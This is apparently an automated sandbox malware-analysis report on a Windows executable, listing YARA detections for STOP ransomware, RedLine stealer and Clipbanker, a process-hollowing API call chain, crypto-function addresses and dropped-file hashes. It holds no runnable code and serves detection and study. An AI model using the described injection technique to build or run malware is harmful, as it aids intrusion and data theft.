Source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001A.00000002.2386315733.0000000000820000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000003.00000002.1652876016.000000000441E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1628654696.0000000004264000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001F.00000002.3619170404.0000000000950000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.1660011852.0000000004577000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.1871352690.000000000084D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.1803890578.0000000004434000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 1020, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 2004, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 3260, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: UXNob1Dp32.exe PID: 7220, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	0_2_05E30110
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E50110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	3_2_05E50110
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	4_2_05DC0110

Detected potential crypto function

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_00404F7E	0_2_00404F7E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E33520	0_2_05E33520
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37520	0_2_05E37520
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E5D7F1	0_2_05E5D7F1
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3A79A	0_2_05E3A79A
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3C760	0_2_05E3C760
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3E6E0	0_2_05E3E6E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E7B69F	0_2_05E7B69F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3A699	0_2_05E3A699
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E5D1A4	0_2_05E5D1A4
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E7E141	0_2_05E7E141
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E39120	0_2_05E39120
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E370E0	0_2_05E370E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E330F0	0_2_05E330F0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E400D0	0_2_05E400D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3B0B0	0_2_05E3B0B0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3A026	0_2_05E3A026
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E4F030	0_2_05E4F030
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3B000	0_2_05E3B000
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37393	0_2_05E37393
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E7E37C	0_2_05E7E37C
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05EB22C0	0_2_05EB22C0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37220	0_2_05E37220
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E35DE7	0_2_05E35DE7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E35DF7	0_2_05E35DF7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E72D1E	0_2_05E72D1E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E64E9F	0_2_05E64E9F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E38E60	0_2_05E38E60
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E359F7	0_2_05E359F7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E389D0	0_2_05E389D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E5E9A3	0_2_05E5E9A3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E5F9B0	0_2_05E5F9B0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3A916	0_2_05E3A916
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E518D0	0_2_05E518D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37880	0_2_05E37880
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3DBE0	0_2_05E3DBE0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E32B60	0_2_05E32B60
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E40B00	0_2_05E40B00
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E37A80	0_2_05E37A80
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E3CA10	0_2_05E3CA10
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040D240	1_2_0040D240
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00419F90	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00405057	1_2_00405057
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040C070	1_2_0040C070
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0042E003	1_2_0042E003
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0042F010	1_2_0042F010
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00408030	1_2_00408030
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004070E0	1_2_004070E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00410160	1_2_00410160
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004C8113	1_2_004C8113
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004021C0	1_2_004021C0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004C9343	1_2_004C9343
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044237E	1_2_0044237E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00405447	1_2_00405447
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00405457	1_2_00405457
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004084C0	1_2_004084C0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004344FF	1_2_004344FF
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00449506	1_2_00449506
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044B5B1	1_2_0044B5B1
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040A660	1_2_0040A660
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00409686	1_2_00409686
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0041E690	1_2_0041E690
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00406740	1_2_00406740
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00402750	1_2_00402750
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040A710	1_2_0040A710
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040F730	1_2_0040F730
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00408780	1_2_00408780
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044D7A1	1_2_0044D7A1
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0042C804	1_2_0042C804
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00406880	1_2_00406880
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00481920	1_2_00481920
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044D9DC	1_2_0044D9DC
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004069F3	1_2_004069F3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00449A71	1_2_00449A71
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00443B40	1_2_00443B40
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00402B80	1_2_00402B80
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00406B80	1_2_00406B80
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00409CF9	1_2_00409CF9
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0044ACFF	1_2_0044ACFF
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040DD40	1_2_0040DD40
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00427D6C	1_2_00427D6C
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040BDC0	1_2_0040BDC0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00409DFA	1_2_00409DFA
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0042CE51	1_2_0042CE51
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00406EE0	1_2_00406EE0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00409F76	1_2_00409F76
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00420F30	1_2_00420F30
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00449FE3	1_2_00449FE3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E53520	3_2_05E53520
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57520	3_2_05E57520
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E7D7F1	3_2_05E7D7F1
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5A79A	3_2_05E5A79A
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5C760	3_2_05E5C760
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5E6E0	3_2_05E5E6E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E9B69F	3_2_05E9B69F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5A699	3_2_05E5A699
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E7D1A4	3_2_05E7D1A4
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E9E141	3_2_05E9E141
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E59120	3_2_05E59120
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E570E0	3_2_05E570E0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E530F0	3_2_05E530F0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E600D0	3_2_05E600D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5B0B0	3_2_05E5B0B0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5A026	3_2_05E5A026
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E6F030	3_2_05E6F030
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5B000	3_2_05E5B000
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57393	3_2_05E57393
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E9E37C	3_2_05E9E37C
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05ED22C0	3_2_05ED22C0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57220	3_2_05E57220
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E55DE7	3_2_05E55DE7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E55DF7	3_2_05E55DF7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E92D1E	3_2_05E92D1E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E84E9F	3_2_05E84E9F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E58E60	3_2_05E58E60
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E559F7	3_2_05E559F7
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E589D0	3_2_05E589D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E7E9A3	3_2_05E7E9A3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E7F9B0	3_2_05E7F9B0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5A916	3_2_05E5A916
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E718D0	3_2_05E718D0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57880	3_2_05E57880
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5DBE0	3_2_05E5DBE0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E52B60	3_2_05E52B60
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E60B00	3_2_05E60B00
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E57A80	3_2_05E57A80
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E5CA10	3_2_05E5CA10
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC3520	4_2_05DC3520
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7520	4_2_05DC7520
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DED7F1	4_2_05DED7F1
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCA79A	4_2_05DCA79A
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCC760	4_2_05DCC760
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCE6E0	4_2_05DCE6E0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCA699	4_2_05DCA699
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E0B69F	4_2_05E0B69F
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DED1A4	4_2_05DED1A4
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E0E141	4_2_05E0E141
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC9120	4_2_05DC9120
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DD00D0	4_2_05DD00D0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC30F0	4_2_05DC30F0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC70E0	4_2_05DC70E0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCB0B0	4_2_05DCB0B0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCB000	4_2_05DCB000
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DDF030	4_2_05DDF030
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCA026	4_2_05DCA026
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7393	4_2_05DC7393
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E0E37C	4_2_05E0E37C
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E422C0	4_2_05E422C0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7220	4_2_05DC7220
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC5DF7	4_2_05DC5DF7
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC5DE7	4_2_05DC5DE7
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E02D1E	4_2_05E02D1E
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DF4E9F	4_2_05DF4E9F
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC8E60	4_2_05DC8E60
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC89D0	4_2_05DC89D0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC59F7	4_2_05DC59F7
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DEF9B0	4_2_05DEF9B0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DEE9A3	4_2_05DEE9A3
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCA916	4_2_05DCA916
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DE18D0	4_2_05DE18D0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7880	4_2_05DC7880
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCDBE0	4_2_05DCDBE0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC2B60	4_2_05DC2B60
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DD0B00	4_2_05DD0B00
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7A80	4_2_05DC7A80
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCCA10	4_2_05DCCA10

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll 036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 00428C81 appears 36 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 05E58EC0 appears 57 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 05E60160 appears 49 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 004547A0 appears 31 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 05E80160 appears 49 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 05E78EC0 appears 57 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 0042F7C0 appears 55 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 00428520 appears 67 times
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: String function: 05DF0160 appears 49 times
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: String function: 05DE8EC0 appears 57 times

Sample file is different than original file name gathered from version info

Source: UXNob1Dp32.exe, 00000000.00000000.1623059429.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000001.00000000.1626208631.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000001.00000003.1642209574.00000000030B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000003.00000000.1645867010.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000004.00000000.1648903131.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000005.00000000.1650239940.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000006.00000000.1656218124.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe

Uses 32bit PE files

Source: UXNob1Dp32.exe

